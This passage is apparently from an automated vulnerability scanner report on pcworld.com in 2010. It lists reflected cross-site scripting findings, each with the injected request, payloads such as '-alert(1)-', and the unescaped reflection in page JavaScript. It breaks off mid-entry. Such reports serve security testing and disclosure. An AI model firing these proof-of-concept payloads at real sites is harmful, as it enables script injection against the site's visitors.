Path:	/reviews/collection/1676/top_10_monochrome_laser_printers.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee2e8"><a>6cba2334edc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /reviews/collection/1676/top_10_monochrome_laser_printers.htmlee2e8"><a>6cba2334edc HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D29A81E5116ECE8DCD3DA2043E62FB58; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:02:22 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
om/pixel.gif?ad=pcw.main.reviews/products/printers/chart;pg=chart;c=2106;c=2106;c=2000;c=2100;pos=336showcase;tile=2;sz=336x280;
&url=/reviews/collection/1676/top_10_monochrome_laser_printers.htmlee2e8"><a>6cba2334edc"/>
...[SNIP]...

1.127. http://www.pcworld.com/reviews/collection/1676/top_10_monochrome_laser_printers.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1676/top_10_monochrome_laser_printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37d0e'-alert(1)-'a88398ab77d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1676/top_10_monochrome_laser_printers.html37d0e'-alert(1)-'a88398ab77d HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:02:38 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
serEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1676/top_10_monochrome_laser_printers.html37d0e'-alert(1)-'a88398ab77d';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.128. http://www.pcworld.com/reviews/collection/1677/top_5_snapshot_printers.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1677/top_5_snapshot_printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62b4e'-alert(1)-'5ed55415157 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1677/top_5_snapshot_printers.html62b4e'-alert(1)-'5ed55415157 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:01:52 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
e('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1677/top_5_snapshot_printers.html62b4e'-alert(1)-'5ed55415157';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.129. http://www.pcworld.com/reviews/collection/1678/top_stereo_bluetooth_headsets.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1678/top_stereo_bluetooth_headsets.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceca0'-alert(1)-'3abb31f0457 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1678/top_stereo_bluetooth_headsets.htmlceca0'-alert(1)-'3abb31f0457 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4DCDC94C1A16ED397CBA39FE3129CE11; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1678/top_stereo_bluetooth_headsets.htmlceca0'-alert(1)-'3abb31f0457';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.130. http://www.pcworld.com/reviews/collection/1680/top_5_solidstate_drives.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1680/top_5_solidstate_drives.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb738'-alert(1)-'0ca9dc1da8d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1680/top_5_solidstate_drives.htmleb738'-alert(1)-'0ca9dc1da8d HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E60E2C61FB31841BF5AC7EB4659B7CE4; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
e('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1680/top_5_solidstate_drives.htmleb738'-alert(1)-'0ca9dc1da8d';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.131. http://www.pcworld.com/reviews/collection/1681/top_sync_services.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1681/top_sync_services.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bac5c'-alert(1)-'57fbfb9b01 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1681/top_sync_services.htmlbac5c'-alert(1)-'57fbfb9b01 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4F3B1CDEE8F6D14E0C5D37DD9464B39E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:00:57 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
dCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1681/top_sync_services.htmlbac5c'-alert(1)-'57fbfb9b01';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.132. http://www.pcworld.com/reviews/collection/1683/top_hd_camcorders.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1683/top_hd_camcorders.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5549'-alert(1)-'44108223ee7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1683/top_hd_camcorders.htmle5549'-alert(1)-'44108223ee7 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:06:13 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
dCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1683/top_hd_camcorders.htmle5549'-alert(1)-'44108223ee7';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.133. http://www.pcworld.com/reviews/collection/1685/top_rated_megazoom_cameras.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1685/top_rated_megazoom_cameras.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4613'-alert(1)-'33673fbb557 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1685/top_rated_megazoom_cameras.htmlf4613'-alert(1)-'33673fbb557 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8435514F3462B22DB218FB9C8F47E80D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:02:42 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1685/top_rated_megazoom_cameras.htmlf4613'-alert(1)-'33673fbb557';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.134. http://www.pcworld.com/reviews/collection/1705/top_pocket_megazooms.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1705/top_pocket_megazooms.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2a3a'-alert(1)-'4f154188b71 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1705/top_pocket_megazooms.htmlb2a3a'-alert(1)-'4f154188b71 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=96E2908A0DB39E4CE553D91D0FDCCE15; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
okie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1705/top_pocket_megazooms.htmlb2a3a'-alert(1)-'4f154188b71';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.135. http://www.pcworld.com/reviews/collection/1985/.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1985/.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a4cd'-alert(1)-'901885d8a62 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1985/.html3a4cd'-alert(1)-'901885d8a62 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:06:24 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1985/.html3a4cd'-alert(1)-'901885d8a62';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.136. http://www.pcworld.com/reviews/collection/3146/top_mainstream_pcs.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/3146/top_mainstream_pcs.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2042'-alert(1)-'08e3df2e1d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/3146/top_mainstream_pcs.htmlc2042'-alert(1)-'08e3df2e1d HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4434053ED8A01F4DF74DFC1123D790CC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
Cookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/3146/top_mainstream_pcs.htmlc2042'-alert(1)-'08e3df2e1d';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.137. http://www.pcworld.com/reviews/product/299836/review/lexmark_platinum_pro905.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/299836/review/lexmark_platinum_pro905.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 203a1'-alert(1)-'8ce5798dba8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/299836/review203a1'-alert(1)-'8ce5798dba8/lexmark_platinum_pro905.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:08:16 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=CA9039D7CE2A8B068F9A5975E568D5C3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:08:16 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/299836/review203a1'-alert(1)-'8ce5798dba8/lexmark_platinum_pro905.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       docu
...[SNIP]...

1.138. http://www.pcworld.com/reviews/product/299836/review/lexmark_platinum_pro905.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/299836/review/lexmark_platinum_pro905.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7c27'-alert(1)-'4fc192ab0d9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/299836/review/lexmark_platinum_pro905.htmla7c27'-alert(1)-'4fc192ab0d9 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:08:19 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/299836/review/lexmark_platinum_pro905.htmla7c27'-alert(1)-'4fc192ab0d9';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.139. http://www.pcworld.com/reviews/product/412265/review/canon_pixma_mx870.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/412265/review/canon_pixma_mx870.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95ed1'-alert(1)-'7f87a47127 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/412265/review95ed1'-alert(1)-'7f87a47127/canon_pixma_mx870.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:07:52 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=FCC3B6E618260E21652DC80BFF7B6A87; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:07:51 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/412265/review95ed1'-alert(1)-'7f87a47127/canon_pixma_mx870.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.c
...[SNIP]...

1.140. http://www.pcworld.com/reviews/product/412265/review/canon_pixma_mx870.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/412265/review/canon_pixma_mx870.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 862ca'-alert(1)-'76fc45e75c3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/412265/review/canon_pixma_mx870.html862ca'-alert(1)-'76fc45e75c3 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9EF2F7E835A13B8E31F45F9079935162; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:07:57 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
e('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/412265/review/canon_pixma_mx870.html862ca'-alert(1)-'76fc45e75c3';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.141. http://www.pcworld.com/reviews/product/418937/review/lenovo_thinkpad_w701ds.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/418937/review/lenovo_thinkpad_w701ds.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59e07'-alert(1)-'ed5e5f69078 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/418937/review59e07'-alert(1)-'ed5e5f69078/lenovo_thinkpad_w701ds.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:10:45 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:45 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/418937/review59e07'-alert(1)-'ed5e5f69078/lenovo_thinkpad_w701ds.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       docum
...[SNIP]...

1.142. http://www.pcworld.com/reviews/product/418937/review/lenovo_thinkpad_w701ds.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/product/418937/review/lenovo_thinkpad_w701ds.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d77f'-alert(1)-'b730f841bb2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/product/418937/review/lenovo_thinkpad_w701ds.html8d77f'-alert(1)-'b730f841bb2 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

